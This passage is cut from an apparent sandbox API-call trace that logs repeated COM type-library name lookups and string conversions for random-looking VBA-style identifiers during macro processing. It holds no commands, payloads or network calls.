cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sAAAAQ") returned 7 [0069.326] ITypeComp:RemoteBind (in: This=0x665ba60, szName="sAAAAQ", lHashVal=0x10ef0e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80386, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sAAAAQ") returned 7 [0069.326] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="sAAAAQ", lHashVal=0x10ef0e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80386, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sAAAAQ") returned 7 [0069.327] ITypeComp:RemoteBind (in: This=0x665bd30, szName="sAAAAQ", lHashVal=0x10ef0e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.327] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sAAAAQ") returned 0x10ef0e [0069.327] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="sAAAAQ" | out: _Dst="sAAAAQ") returned 0x0 [0069.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="sAAAAQ") returned 7 [0069.327] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.327] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="sAAAAQ", lHashVal=0x10ef0e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.327] IUnknown:Release (This=0x665ba50) returned 0xd [0069.327] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.327] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="sAAAAQ", lHashVal=0x10ef0e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.327] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.327] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.327] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="sAAAAQ", lHashVal=0x10ef0e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.327] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.327] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.327] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="sAAAAQ", lHashVal=0x10ef0e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.327] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80386, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sAAAAQ") returned 7 [0069.327] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="sAAAAQ", lHashVal=0x10ef0e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.327] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.327] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80386 | out: _Dst=0x67c2d40) returned 0x0 [0069.327] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_sAAAAQ") returned 0x106978 [0069.327] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_sAAAAQ" | out: _Dst="_B_var_sAAAAQ") returned 0x0 [0069.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_sAAAAQ") returned 14 [0069.327] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.328] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_sAAAAQ", lHashVal=0x106978, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.328] IUnknown:Release (This=0x665ba50) returned 0xd [0069.328] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.328] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_sAAAAQ", lHashVal=0x106978, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.328] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.328] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.328] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_sAAAAQ", lHashVal=0x106978, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.328] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.328] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.328] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_sAAAAQ", lHashVal=0x106978, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.328] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.328] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.328] IUnknown:Release (This=0x665ba50) returned 0xd [0069.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b123be, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_sAAAAQ") returned 14 [0069.328] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_sAAAAQ", lHashVal=0x106978, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.328] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80386 | out: _Dst=0x144ec0) returned 0x0 [0069.328] ITypeComp:RemoteBind (in: This=0x665ba60, szName="m1koQo", lHashVal=0x104e07, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80476, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="m1koQo") returned 7 [0069.328] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="m1koQo", lHashVal=0x104e07, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80476, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="m1koQo") returned 7 [0069.328] ITypeComp:RemoteBind (in: This=0x665bd30, szName="m1koQo", lHashVal=0x104e07, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.329] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m1koQo") returned 0x104e07 [0069.329] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="m1koQo" | out: _Dst="m1koQo") returned 0x0 [0069.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="m1koQo") returned 7 [0069.329] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.329] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="m1koQo", lHashVal=0x104e07, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.329] IUnknown:Release (This=0x665ba50) returned 0xd [0069.329] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.329] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="m1koQo", lHashVal=0x104e07, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.329] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.329] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.329] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="m1koQo", lHashVal=0x104e07, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.329] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.329] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.329] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="m1koQo", lHashVal=0x104e07, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.329] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80476, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="m1koQo") returned 7 [0069.329] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="m1koQo", lHashVal=0x104e07, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.329] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.329] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80476 | out: _Dst=0x67c2d40) returned 0x0 [0069.329] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_m1koQo") returned 0x10c8b0 [0069.330] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_m1koQo" | out: _Dst="_B_var_m1koQo") returned 0x0 [0069.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_m1koQo") returned 14 [0069.330] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.330] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_m1koQo", lHashVal=0x10c8b0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.330] IUnknown:Release (This=0x665ba50) returned 0xd [0069.330] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.330] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_m1koQo", lHashVal=0x10c8b0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.330] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.330] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.330] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_m1koQo", lHashVal=0x10c8b0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.330] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.330] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.330] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_m1koQo", lHashVal=0x10c8b0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.330] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.330] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.330] IUnknown:Release (This=0x665ba50) returned 0xd [0069.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b123ee, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_m1koQo") returned 14 [0069.330] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_m1koQo", lHashVal=0x10c8b0, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x51006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x51006f00000000, pDummy=0x0) returned 0x0 [0069.330] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80476 | out: _Dst=0x144ec0) returned 0x0 [0069.330] ITypeComp:RemoteBind (in: This=0x665ba60, szName="OUCDAwB", lHashVal=0x102e73, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8044e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="OUCDAwB") returned 8 [0069.330] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="OUCDAwB", lHashVal=0x102e73, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8044e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="OUCDAwB") returned 8 [0069.330] ITypeComp:RemoteBind (in: This=0x665bd30, szName="OUCDAwB", lHashVal=0x102e73, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.331] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OUCDAwB") returned 0x102e73 [0069.331] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="OUCDAwB" | out: _Dst="OUCDAwB") returned 0x0 [0069.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="OUCDAwB") returned 8 [0069.331] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.331] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="OUCDAwB", lHashVal=0x102e73, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.331] IUnknown:Release (This=0x665ba50) returned 0xd [0069.331] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.331] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="OUCDAwB", lHashVal=0x102e73, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.331] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.331] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.331] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="OUCDAwB", lHashVal=0x102e73, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.331] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.331] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.331] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="OUCDAwB", lHashVal=0x102e73, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.331] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8044e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="OUCDAwB") returned 8 [0069.331] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="OUCDAwB", lHashVal=0x102e73, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.331] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.331] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8044e | out: _Dst=0x67c2d40) returned 0x0 [0069.331] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_OUCDAwB") returned 0x1031f7 [0069.331] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_OUCDAwB" | out: _Dst="_B_var_OUCDAwB") returned 0x0 [0069.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_OUCDAwB") returned 15 [0069.331] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.331] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_OUCDAwB", lHashVal=0x1031f7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.331] IUnknown:Release (This=0x665ba50) returned 0xd [0069.331] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.331] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_OUCDAwB", lHashVal=0x1031f7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.332] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.332] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.332] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_OUCDAwB", lHashVal=0x1031f7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.332] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.332] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.332] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_OUCDAwB", lHashVal=0x1031f7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.332] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.332] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.332] IUnknown:Release (This=0x665ba50) returned 0xd [0069.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1241e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_OUCDAwB") returned 15 [0069.332] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_OUCDAwB", lHashVal=0x1031f7, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.332] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8044e | out: _Dst=0x144ec0) returned 0x0 [0069.332] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lZ1DA_AU", lHashVal=0x107ab2, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8049e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lZ1DA_AU") returned 9 [0069.332] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lZ1DA_AU", lHashVal=0x107ab2, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8049e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lZ1DA_AU") returned 9 [0069.332] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lZ1DA_AU", lHashVal=0x107ab2, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.332] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lZ1DA_AU") returned 0x107ab2 [0069.332] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="lZ1DA_AU" | out: _Dst="lZ1DA_AU") returned 0x0 [0069.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="lZ1DA_AU") returned 9 [0069.332] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.333] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lZ1DA_AU", lHashVal=0x107ab2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.333] IUnknown:Release (This=0x665ba50) returned 0xd [0069.333] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.333] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lZ1DA_AU", lHashVal=0x107ab2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.333] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.333] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.333] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lZ1DA_AU", lHashVal=0x107ab2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.333] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.333] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.333] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lZ1DA_AU", lHashVal=0x107ab2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.333] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8049e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lZ1DA_AU") returned 9 [0069.333] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lZ1DA_AU", lHashVal=0x107ab2, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.333] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.333] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8049e | out: _Dst=0x67c2d40) returned 0x0 [0069.333] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lZ1DA_AU") returned 0x10523b [0069.333] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_lZ1DA_AU" | out: _Dst="_B_var_lZ1DA_AU") returned 0x0 [0069.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_lZ1DA_AU") returned 16 [0069.333] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.333] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lZ1DA_AU", lHashVal=0x10523b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.333] IUnknown:Release (This=0x665ba50) returned 0xd [0069.333] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.333] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lZ1DA_AU", lHashVal=0x10523b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 